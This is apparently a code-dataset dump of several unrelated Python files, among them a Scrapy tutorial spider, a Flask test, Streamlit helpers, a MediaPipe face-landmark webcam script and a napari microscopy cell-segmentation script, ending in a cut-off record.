{"api_name": "tensorflow.TensorSpec", "line_number": 269, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 269, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorSpec", "line_number": 270, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 270, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorSpec", "line_number": 271, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 271, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorSpec", "line_number": 272, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 272, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 275, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 279, "usage_type": "call"}, {"api_name": "os.path", "line_number": 279, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 286, "usage_type": "call"}, {"api_name": "tensorflow.summary.scalar", "line_number": 292, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 292, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.scalar", "line_number": 294, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 294, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 299, "usage_type": "call"}, {"api_name": "os.path", "line_number": 299, "usage_type": "attribute"}, {"api_name": "tensorflow.transpose", "line_number": 326, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 328, "usage_type": "call"}, {"api_name": "tensorflow.name_scope", "line_number": 353, "usage_type": "call"}, {"api_name": "tensorflow.nn.ctc_beam_search_decoder", "line_number": 354, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 354, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 357, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 357, "usage_type": "attribute"}, {"api_name": "tensorflow.sparse.to_dense", "line_number": 362, "usage_type": "call"}, {"api_name": "tensorflow.sparse", "line_number": 362, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 367, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 374, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 391, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 392, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 392, "usage_type": "attribute"}, {"api_name": "tensorflow.logical_or", "line_number": 396, "usage_type": "call"}, {"api_name": "tensorflow.greater", "line_number": 396, "usage_type": "call"}, {"api_name": "tensorflow.math.mod", "line_number": 396, "usage_type": "call"}, {"api_name": "tensorflow.math", "line_number": 396, "usage_type": "attribute"}, {"api_name": "tensorflow.equal", "line_number": 397, "usage_type": "call"}, {"api_name": "tensorflow.range", "line_number": 400, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 400, "usage_type": "attribute"}, {"api_name": "tensorflow.ones", "line_number": 401, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 401, "usage_type": "attribute"}, {"api_name": "tensorflow.stack", "line_number": 402, "usage_type": "call"}, {"api_name": "tensorflow.linalg.lstsq", "line_number": 403, "usage_type": "call"}, {"api_name": "tensorflow.linalg", "line_number": 403, "usage_type": "attribute"}, {"api_name": "tensorflow.newaxis", "line_number": 403, 
"usage_type": "attribute"}, {"api_name": "tensorflow.reduce_sum", "line_number": 409, "usage_type": "call"}, {"api_name": "tensorflow.square", "line_number": 410, "usage_type": "call"}, {"api_name": "tensorflow_probability.distributions.Normal", "line_number": 412, "usage_type": "call"}, {"api_name": "tensorflow_probability.distributions", "line_number": 412, "usage_type": "attribute"}, {"api_name": "tensorflow.sqrt", "line_number": 412, "usage_type": "call"}, {"api_name": "tensorflow.less_equal", "line_number": 416, "usage_type": "call"}, {"api_name": "tensorflow.concat", "line_number": 424, "usage_type": "call"}, {"api_name": "tensorflow.name_scope", "line_number": 442, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 443, "usage_type": "call"}, {"api_name": "tensorflow.not_equal", "line_number": 443, "usage_type": "call"}, {"api_name": "tensorflow.gather_nd", "line_number": 445, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 447, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 448, "usage_type": "attribute"}, {"api_name": "tensorflow.SparseTensor", "line_number": 449, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 496, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 496, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 550, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 550, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 551, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 551, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 557, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 559, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 561, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 568, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 568, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 572, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 579, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 581, "usage_type": "attribute"}, {"api_name": "numpy.tile", "line_number": 589, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 594, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 596, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 597, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 629, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 630, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 632, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 633, "usage_type": "call"}, {"api_name": "tensorflow.norm", "line_number": 644, "usage_type": "call"}, {"api_name": "tensorflow.norm", "line_number": 646, "usage_type": "call"}, {"api_name": "tensorflow.norm", "line_number": 648, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 648, "usage_type": "attribute"}, {"api_name": "tensorflow.gather", "line_number": 651, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 652, "usage_type": "call"}, {"api_name": "tensorflow.gather", "line_number": 655, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 660, "usage_type": "call"}, {"api_name": "tensorflow.abs", "line_number": 660, "usage_type": "call"}, {"api_name": 
"tensorflow.sqrt", "line_number": 663, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 664, "usage_type": "call"}, {"api_name": "tensorflow.reduce_max", "line_number": 666, "usage_type": "call"}, {"api_name": "tensorflow.abs", "line_number": 666, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 669, "usage_type": "call"}, {"api_name": "tensorflow.norm", "line_number": 670, "usage_type": "call"}, {"api_name": "tensorflow.norm", "line_number": 671, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 681, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 686, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 686, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 686, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_sum", "line_number": 687, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 703, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 703, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 706, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 707, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 713, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 721, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 729, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 745, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 746, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 748, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 749, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 752, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 752, "usage_type": "call"}, {"api_name": "tensorflow.norm", "line_number": 753, "usage_type": "call"}, {"api_name": "tensorflow.newaxis", "line_number": 754, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 759, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 759, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 759, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 760, "usage_type": "call"}]} +{"seq_id": "36374248450", "text": " #_*_ coding:utf-8 _*_ \n\nimport scrapy\n\n#通过getattr传入tag参数,构建类似于 http://quotes.toscrape.com/tag/humor形式的url\nclass Author_Spider(scrapy.Spider):\n\tname='tag'\n\tdef start_requests(self):\n\t\turl='http://quotes.toscrape.com/'\n\t\ttag=getattr(self,'tag',None)\n\t\tif tag:\n\t\t\turl=url+'tag/'+tag\n\t\tyield scrapy.Request(url=url,callback=self.parse)\n\t\t\n\n\tdef parse(self,response):\n\t\tself.log('Now running %s'%self.name)\n\n\t\tfor quote in response.css('div.quote'):\n\t\t\tyield dict(text=quote.css('span.text::text').extract_first(),\n\t\t\t\t\t\tauthor=quote.css('small.author::text').extract_first(),\n\t\t\t\t\t\t)\n\n\t\t#解析下一页\n\t\tfor href in response.css('li.next a::attr(href)'):\n\t\t\tyield response.follow(url=href,callback=self.parse)\n\n\t", "repo_name": "chinaylssly/scrapy", "sub_path": "tutorial/tutorial/spiders/tag_spider.py", "file_name": "tag_spider.py", "file_ext": "py", "file_size_in_byte": 741, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "scrapy.Spider", "line_number": 6, "usage_type": 
"attribute"}, {"api_name": "scrapy.Request", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "23935435680", "text": "\nfrom unittest import TestCase\n\nfrom flask_injector import FlaskInjector\nfrom injector import Injector\n\nfrom autobrew.configuration import configure_test\nfrom autobrew.webserver import app\n\n\nclass TestBrewWebserver(TestCase):\n def make_client(self):\n self.injector = Injector([configure_test])\n FlaskInjector(app=app, injector=self.injector)\n return app.test_client()\n\n def test_update_status(self):\n client = self.make_client()\n response = client.get(\"/brews/new?name=statusbrew\")\n self.assertEqual(response.status_code, 200)\n\n response = client.get(\"/brews/0/status?stage=BOTTLE_CONDITIONING\")\n self.assertEqual(response.status_code, 200)\n\n response = client.get(\"/brews/\")\n self.assertIn(\"CONDITIONING\", str(response.data))\n\n response = client.get(\"/brews/0/complete\")\n self.assertEqual(response.status_code, 200)\n\n response = client.get(\"/brews/\")\n self.assertIn(\"COMPLETE\", str(response.data))\n\n\n", "repo_name": "paulharte/autobrew", "sub_path": "test/brew/test_brew_endpoints.py", "file_name": "test_brew_endpoints.py", "file_ext": "py", "file_size_in_byte": 1005, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "unittest.TestCase", "line_number": 11, "usage_type": "name"}, {"api_name": "injector.Injector", "line_number": 13, "usage_type": "call"}, {"api_name": "autobrew.configuration.configure_test", "line_number": 13, "usage_type": "name"}, {"api_name": "flask_injector.FlaskInjector", "line_number": 14, "usage_type": "call"}, {"api_name": "autobrew.webserver.app", "line_number": 14, "usage_type": "name"}, {"api_name": "autobrew.webserver.app.test_client", "line_number": 15, "usage_type": "call"}, {"api_name": "autobrew.webserver.app", "line_number": 15, "usage_type": "name"}]} +{"seq_id": "32315767614", "text": "from modules.database import *\nimport streamlit as st\n\n\ndef InitPageSetting(st, path, PAGE_NAME, PAGE_ICON, name_file_css=\"\"):\n current_dir = path\n CSS_MAIN = current_dir / \"assets\" / \"styles\" / \"main.css\"\n st.set_page_config(PAGE_NAME, PAGE_ICON)\n if name_file_css:\n css_file = current_dir/\"assets\" / \"styles\" / name_file_css\n Custom_CSS(st, CSS_MAIN)\n Custom_CSS(st, css_file)\n else:\n Custom_CSS(st, CSS_MAIN)\n\n\ndef Custom_CSS(st, css_file):\n with open(css_file) as f:\n st.markdown(\"\".format(f.read()),\n unsafe_allow_html=True)\n\n\ndef Custom_Code(st, data):\n st.markdown(data, unsafe_allow_html=True)\n\n\ndef Custom_Title(st, title):\n st.subheader(title)\n st.markdown(\"#\")\n \ndef download_button(label, file_path, key=None):\n with open(file_path, \"rb\") as f:\n file_contents = f.read()\n st.download_button(label, data=file_contents, file_name=file_path.split(\"/\")[-1], key=key)", "repo_name": "baolongdev/Tinhoc12", "sub_path": "modules/modules.py", "file_name": "modules.py", "file_ext": "py", "file_size_in_byte": 988, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "streamlit.set_page_config", "line_number": 8, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 19, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 24, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 28, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 29, 
"usage_type": "call"}, {"api_name": "streamlit.download_button", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "71620460965", "text": "import cv2\nimport numpy as np\nfrom typing import Tuple, Union\nimport math\nimport mediapipe as mp\nfrom mediapipe.tasks import python\nfrom mediapipe.tasks.python import vision\nfrom mediapipe import solutions\nfrom mediapipe.framework.formats import landmark_pb2\nimport matplotlib.pyplot as plt\n\nfrom run import face_detection,face_landmark\n\n\n\ncap = cv2.VideoCapture(0) \n\n\nwhile True:\n ret, frame = cap.read() \n\n if ret == False:\n break\n\n frame = cv2.cvtColor(frame,cv2.COLOR_BGR2RGB)\n frame_mp = mp.Image(image_format=mp.ImageFormat.SRGB, data=frame)\n\n\n detection_result_FD = face_detection.run_face_detection(frame_mp)\n\n\n frame_copy = np.copy(frame_mp.numpy_view())\n annotated_image = face_detection.visualize(frame_copy, detection_result_FD)\n rgb_annotated_image = cv2.cvtColor(annotated_image, cv2.COLOR_BGR2RGB)\n \n \n \n for detection in detection_result_FD.detections:\n bounding_box = detection.bounding_box\n left_top = (bounding_box.origin_x, bounding_box.origin_y)\n right_bottom = (bounding_box.origin_x + bounding_box.width, bounding_box.origin_y + bounding_box.height)\n cropped_image = frame[int(left_top[1])-200:int(right_bottom[1])+50, int(left_top[0])-50:int(right_bottom[0])+50]\n cropped_image = cv2.cvtColor(cropped_image,cv2.COLOR_BGR2RGB)\n\n if detection_result_FD.detections:\n cropped_image_mp = mp.Image(image_format=mp.ImageFormat.SRGB, data=cropped_image)\n \n detection_result_FL = face_landmark.run_face_landmark(cropped_image_mp)\n\n # print(face_landmark.asy_val(detection_result_FL))\n # annotated_image = face_landmark.draw_landmarks_on_image(cropped_image_mp.numpy_view(), detection_result_FL)\n\n rotated_img = face_landmark.align_face(detection_result_FL,cropped_image)\n rotated_img_mp = mp.Image(image_format=mp.ImageFormat.SRGB, data=rotated_img)\n\n detection_result_RI = face_landmark.run_face_landmark(rotated_img_mp)\n\n annotated_image = face_landmark.draw_landmarks_on_image(rotated_img_mp.numpy_view(), detection_result_RI)\n\n asy_angle = face_landmark.asy_val(detection_result_RI,rotated_img)\n\n if asy_angle > 25:\n cv2.putText(annotated_image, str(asy_angle) , (50,50), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\n\n else:\n cv2.putText(annotated_image, str(asy_angle) , (50,50), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 2)\n \n cv2.imshow('result',annotated_image)\n # cv2.imshow('result',rotated_img)\n cv2.imshow('test',rgb_annotated_image)\n if cv2.waitKey(10) & 0xFF == ord('q'): # 'q' 키를 누르면 종료합니다.\n break\n\n\n\n", "repo_name": "HCW0727/SOKDOC", "sub_path": "main_webcam.py", "file_name": "main_webcam.py", "file_ext": "py", "file_size_in_byte": 2547, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.VideoCapture", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 25, "usage_type": "attribute"}, {"api_name": "mediapipe.Image", "line_number": 26, "usage_type": "call"}, {"api_name": "mediapipe.ImageFormat", "line_number": 26, "usage_type": "attribute"}, {"api_name": "run.face_detection.run_face_detection", "line_number": 29, "usage_type": "call"}, {"api_name": "run.face_detection", "line_number": 29, "usage_type": "name"}, {"api_name": "numpy.copy", "line_number": 32, "usage_type": "call"}, {"api_name": 
"run.face_detection.visualize", "line_number": 33, "usage_type": "call"}, {"api_name": "run.face_detection", "line_number": 33, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 34, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 43, "usage_type": "attribute"}, {"api_name": "mediapipe.Image", "line_number": 46, "usage_type": "call"}, {"api_name": "mediapipe.ImageFormat", "line_number": 46, "usage_type": "attribute"}, {"api_name": "run.face_landmark.run_face_landmark", "line_number": 48, "usage_type": "call"}, {"api_name": "run.face_landmark", "line_number": 48, "usage_type": "name"}, {"api_name": "run.face_landmark.align_face", "line_number": 53, "usage_type": "call"}, {"api_name": "run.face_landmark", "line_number": 53, "usage_type": "name"}, {"api_name": "mediapipe.Image", "line_number": 54, "usage_type": "call"}, {"api_name": "mediapipe.ImageFormat", "line_number": 54, "usage_type": "attribute"}, {"api_name": "run.face_landmark.run_face_landmark", "line_number": 56, "usage_type": "call"}, {"api_name": "run.face_landmark", "line_number": 56, "usage_type": "name"}, {"api_name": "run.face_landmark.draw_landmarks_on_image", "line_number": 58, "usage_type": "call"}, {"api_name": "run.face_landmark", "line_number": 58, "usage_type": "name"}, {"api_name": "run.face_landmark.asy_val", "line_number": 60, "usage_type": "call"}, {"api_name": "run.face_landmark", "line_number": 60, "usage_type": "name"}, {"api_name": "cv2.putText", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 63, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 66, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 68, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 70, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "39340632583", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 21 16:36:35 2020\n\nSegment cells and remove lipofuscin pixels\n\n@author: Amrita S\n\"\"\"\nfrom IPython import get_ipython\nipython = get_ipython()\nipython.magic(\"gui qt5\") \n\nimport napari\nfrom PIL import Image\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\nimport matplotlib.colors as colors\nimport time\n\nimport pickle as pkl\nfrom os.path import sep\n\nimport Cell\nimport pixels_in_roi\nimport diff_gauss\nimport scatter_channels\nimport hist_channels\nimport m_dist\n\n# %% Load images\nt0 = time.time()\nfolder = 'G:\\\\Shared drives\\\\as_share\\\\HCR\\\\HCR_10.17\\\\S2_DAPI_546_647_514_594_2019_10_19__16_28_49'\nplane_nos = range(1, 16)\n\n# base_filename2 = 'S1_dapi_546_488_647_s2z'\nbase_filename = 'S2_DAPI_546_647_514_594_2019_10_19__16_28_49_z'\nn = len(plane_nos)\nprint('Number of planes: {0}'.format(n))\n\n# Create 4D array to store images\nimg = Image.open('{0}\\\\{1}{2}c4_ORG.tif'.format(folder, base_filename, str(plane_nos[0]).zfill(2)))\n\nh = img.height\nw = img.width\nim_array_gad1 = np.zeros([n, h, w])\nim_array_vip = np.zeros([n, h, w])\nim_array_sst = np.zeros([n, h, w])\nim_array_ndnf = np.zeros([n, h, w])\nprint('Size of image in pixels: {0} X {1} X {2}'.format(n, h, w))\n\nfor i in range(n):\n print('Loading image {0}, {1} seconds'.format(i + 1, 
np.round(time.time() - t0)))\n    p = plane_nos[i]\n    img_gad1 = Image.open('{0}\{1}{2}c4_ORG.tif'.format(folder, base_filename, str(p).zfill(2)))\n    img_vip = Image.open('{0}\{1}{2}c2_ORG.tif'.format(folder, base_filename, str(p).zfill(2)))\n    img_sst = Image.open('{0}\{1}{2}c5_ORG.tif'.format(folder, base_filename, str(p).zfill(2)))\n    img_ndnf = Image.open('{0}\{1}{2}c3_ORG.tif'.format(folder, base_filename, str(p).zfill(2)))\n    try:\n        im_array_gad1[i, :, :] = np.array(img_gad1)\n        im_array_vip[i, :, :] = np.array(img_vip)\n        im_array_sst[i, :, :] = np.array(img_sst)\n        im_array_ndnf[i, :, :] = np.array(img_ndnf)\n    except:\n        print('Plane {0} could not be loaded'.format(p))\n        print('Size of plane {0} in pixels: {1} X {2}'.format(p, img.height, img.width))\n        im_array_gad1 = np.delete(im_array_gad1, i, axis = 0)\n        im_array_vip = np.delete(im_array_vip, i, axis = 0)\n        im_array_sst = np.delete(im_array_sst, i, axis = 0)\n        im_array_ndnf = np.delete(im_array_ndnf, i, axis = 0)\n        plane_nos.remove(p)\n        i -= 1\n        n = len(plane_nos)\n        continue\n\ndel img_gad1\ndel img_vip\ndel img_sst\ndel img_ndnf\n\n# %% Render image in napari gui\n\nviewer = napari.Viewer()\nviewer.add_image(im_array_gad1, name = 'Gad1', colormap = 'cyan', blending = 'additive')\nviewer.add_image(im_array_ndnf, name = 'Ndnf', colormap = 'magenta', blending = 'additive')\nviewer.add_image(im_array_vip, name = 'Vip', colormap = 'yellow', blending = 'additive')\nviewer.add_image(im_array_sst, name = 'Sst', colormap = 'green', blending = 'additive')\n\n# %% Load cell rois\n# Load masks if they already exist\nsave_loc = 'G:\\\\Shared drives\\\\as_share\\\\HCR\\\\HCR_10.17'\nsave_file= 'S2_data.pkl'\ntry:\n    with open('{0}\\{1}'.format(save_loc, save_file), 'rb') as f:\n        Cell.cell_data = pkl.load(f)\n    indices = list(Cell.cell_data.keys())\n    if not np.max(indices) == len(indices):\n        print('Re-numbering cells to be consecutive')\n        Cell.cell_data_temp = {}\n        for i in range(len(indices)):\n            Cell.cell_data_temp[i + 1] = Cell.cell_data[indices[i]]\n            Cell.cell_data_temp[i + 1]['cell_id'] = i + 1\n        Cell.cell_data = Cell.cell_data_temp \n        with open('{0}\\{1}'.format(save_loc, save_file), 'wb') as f:\n            pkl.dump(Cell.cell_data, f)\n        Cell.n_cells = i + 1\n    else:\n        Cell.n_cells = len(indices)\n    print('{0} cells found'.format(Cell.n_cells))\nexcept:\n    print('No data found')\n\n\n# %% Add masks to napari viewer\n\nmask_layer = viewer.add_shapes(name = 'Cell masks')\n\nindices = list(Cell.cell_data.keys())\nfor cell in indices:\n    if np.mod(cell, 10) == 0:\n        print('Cell {0}'.format(cell))\n    planes = Cell.cell_data[cell]['z_planes']\n    for plane in planes:\n        mask = Cell.cell_data[cell]['masks'][plane]\n        mask = np.concatenate((np.ones([mask.shape[0], 1])*plane, mask), axis = 1)\n        mask_layer.add(mask, shape_type = 'polygon', opacity = 0.2, face_color = 'white', edge_color = 'red', edge_width = 3)\n\n\n# %% Load lipofuscin rois\nsave_loc = 'G:\\\\Shared drives\\\\as_share\\\\HCR\\\\HCR_10.17'\nsave_file = 'HCR_10.17_S2_lipofuscin_rois_in_cells.pkl'\n\nwith open('{0}\\\\{1}'.format(save_loc, save_file), 'rb') as f:\n    l_rois = pkl.load(f) \n\n# %% Add lipofuscin rois to viewer\nn_rois = len(l_rois)\nprint('{0} rois found'.format(n_rois))\nviewer.add_shapes(l_rois, name = 'Lipofuscin ROIs',\n                  shape_type = 'polygon', opacity = 1, face_color = 'white', \n                  edge_color = 'blue', edge_width = 3)\n\n# %% Save lipofuscin rois from viewer\nsave_loc = 'G:\\\\Shared drives\\\\as_share\\\\HCR\\\\HCR_10.17'\nsave_file = 'HCR_10.17_S2_lipofuscin_rois_in_cells.pkl'\n\nl_rois = 
viewer.layers['Lipofuscin ROIs'].data\n\nwith open('{0}\\\\{1}'.format(save_loc, save_file), 'wb') as f:\n pkl.dump(l_rois, f) \n\n# %% Get pixels in cell ROIs\nsave_loc = 'G:\\\\Shared drives\\\\as_share\\\\HCR\\\\HCR_10.17'\n# save_file = 'S2_cell_pixels.pkl'\nsave_file = 'S2_mask_vertices.pkl'\n\ntry:\n with open('{0}\\\\{1}'.format(save_loc, save_file), 'rb') as f:\n mask_vertices = pkl.load(f)\n cells = mask_vertices.keys()\n x = 0\n all_cell_pixels = np.zeros([1, 3])\n for cell in cells:\n data = Cell.cell_data[cell]\n planes = data['z_planes']\n for plane in planes:\n xvals = np.reshape(mask_vertices[cell][plane][0], [-1, 1])\n yvals = np.reshape(mask_vertices[cell][plane][1], [-1, 1])\n zvals = np.ones([len(xvals), 1])*plane\n coords = np.concatenate((zvals, xvals, yvals), axis = 1)\n all_cell_pixels = np.concatenate((all_cell_pixels, coords), axis = 0)\n \n all_cell_pixels = all_cell_pixels[1:, :].astype(int)\n \n print('Data loaded')\n \nexcept IOError:\n print('No saved data found, calculating mask pixels')\n c_rois = viewer.layers['Cell masks'].data\n px = pixels_in_roi.pixels_in_roi(h, w, n, c_rois)\n all_cell_pixels = px['all_pixels']\n cell_pixels_roi = px['pixels_roi']\n with open('{0}{1}{2}'.format(save_loc, sep, save_file), 'wb') as f:\n pkl.dump({'all_cell_pixels': all_cell_pixels, 'cell_pixels_roi': cell_pixels_roi}, f)\n# px = pixels_in_roi.pixels_in_roi(h, w, l_rois)\n# all_cell_pixels = px['all_pixels']\n\n\n# %% Get pixels in lipofuscin ROIs\n\nsave_loc = 'G:\\\\Shared drives\\\\as_share\\\\HCR\\\\HCR_10.17'\nsave_file = 'HCR_10.17_S2_lipofuscin_pixels_in_cells.pkl'\n \ntry:\n with open('{0}{1}{2}'.format(save_loc, sep, save_file), 'rb') as f:\n mask_vertices = pkl.load(f)\n all_lipo_pixels = mask_vertices['all_lipo_pixels']\n lipo_pixels_roi = mask_vertices['lipo_pixels_roi']\n print('Data loaded')\n \nexcept IOError:\n print('No saved data found, calculating mask pixels')\n px = pixels_in_roi.pixels_in_roi(h, w, n, l_rois)\n all_lipo_pixels = px['all_pixels']\n lipo_pixels_roi = px['pixels_roi']\n with open('{0}{1}{2}'.format(save_loc, sep, save_file), 'wb') as f:\n pkl.dump({'all_lipo_pixels': all_lipo_pixels, 'lipo_pixels_roi': lipo_pixels_roi}, f)\n \n# %% Get background \nwith open('{0}\\\\S2_background_ndnf_sst_vip.pkl'.format(save_loc), 'rb') as f:\n dict = pkl.load(f)\n \navg_bg_ndnf = dict['Ndnf'] \navg_bg_sst = dict['Sst'] \navg_bg_vip = dict['Vip'] \n \n\n\n# %% Filter images with difference of gaussians to amplify lipofuscin-sized spots\n\nsigma_small = 2\nsigma_large = 5\n\nt0 = time.time() \n\nimg = im_array_ndnf\nim_diff_ndnf = diff_gauss.diff_gauss(sigma_small, sigma_large, img, do_plot = 1)\nt1 = time.time() - t0\nprint('{0} seconds'.format(int(t1)))\n\nimg = im_array_sst\nim_diff_sst = diff_gauss.diff_gauss(sigma_small, sigma_large, img, do_plot = 0)\nt1 = time.time() - t0\nprint('{0} seconds'.format(int(t1)))\n\nimg = im_array_vip\nim_diff_vip = diff_gauss.diff_gauss(sigma_small, sigma_large, img, do_plot = 0)\nt1 = time.time() - t0\nprint('{0} seconds'.format(int(t1)))\n\n# %% \nviewer.add_image(data = im_diff_ndnf, name = 'Diff ndnf', colormap = 'magenta', blending = 'additive')\nviewer.add_image(data = im_diff_sst, name = 'Diff Sst', colormap = 'green', blending = 'additive')\nviewer.add_image(data = im_diff_vip, name = 'Diff Vip', colormap = 'yellow', blending = 'additive')\n\n# %% Plot histogram of filtered images cell pixels and lipofuscin pixels\n\n#img_dict = {'Ndnf': im_diff_ndnf, 'Sst': im_diff_sst, 'Vip': im_diff_vip}\nimg_dict = 
{'Ndnf': im_array_ndnf, 'Sst': im_array_sst, 'Vip': im_array_vip}\n\npixels_dict = {'Cells': all_cell_pixels, 'Lipofuscin': all_lipo_pixels}\n#pixels_dict = {'Cells': all_cell_pixels}\ncolors_dict = {'Cells': 'b', 'Lipofuscin': 'k'}\n#title = 'Diff gauss sigma = ({0}, {1})'.format(sigma_small, sigma_large)\ntitle = 'Raw images'\nsave_loc = 'G:\\\\Shared drives\\\\as_share\\\\HCR\\\\HCR_10.17\\\\S2_scatter_plots'\nsave_file = '{0} hist lipo + cells.png'.format(title)\n#save_file = '{0} hist cells.png'.format(title)\n\nhist_channels.hist_channels(img_dict, pixels_dict, max_per_group= 100000, colors_dict = colors_dict, \n title = title, save = True, save_loc = save_loc, save_file = save_file)\n\ndel img_dict\ndel pixels_dict\n\n# %% Binarize filtered images cell pixels and lipofuscin pixels\n\nimg_dict = {'Ndnf': im_diff_ndnf, 'Sst': im_diff_sst, 'Vip': im_diff_vip}\n#img_dict = {'Ndnf': im_array_ndnf, 'Sst': im_array_sst, 'Vip': im_array_vip}\n\npixels_dict = {'Cells': all_cell_pixels, 'Lipofuscin': all_lipo_pixels}\n#pixels_dict = {'Cells': all_cell_pixels}\ncolors_dict = {'Cells': 'b', 'Lipofuscin': 'k'}\ntitle = 'Diff gauss sigma = ({0}, {1})'.format(sigma_small, sigma_large)\n#title = 'Raw images'\nsave_loc = 'G:\\\\Shared 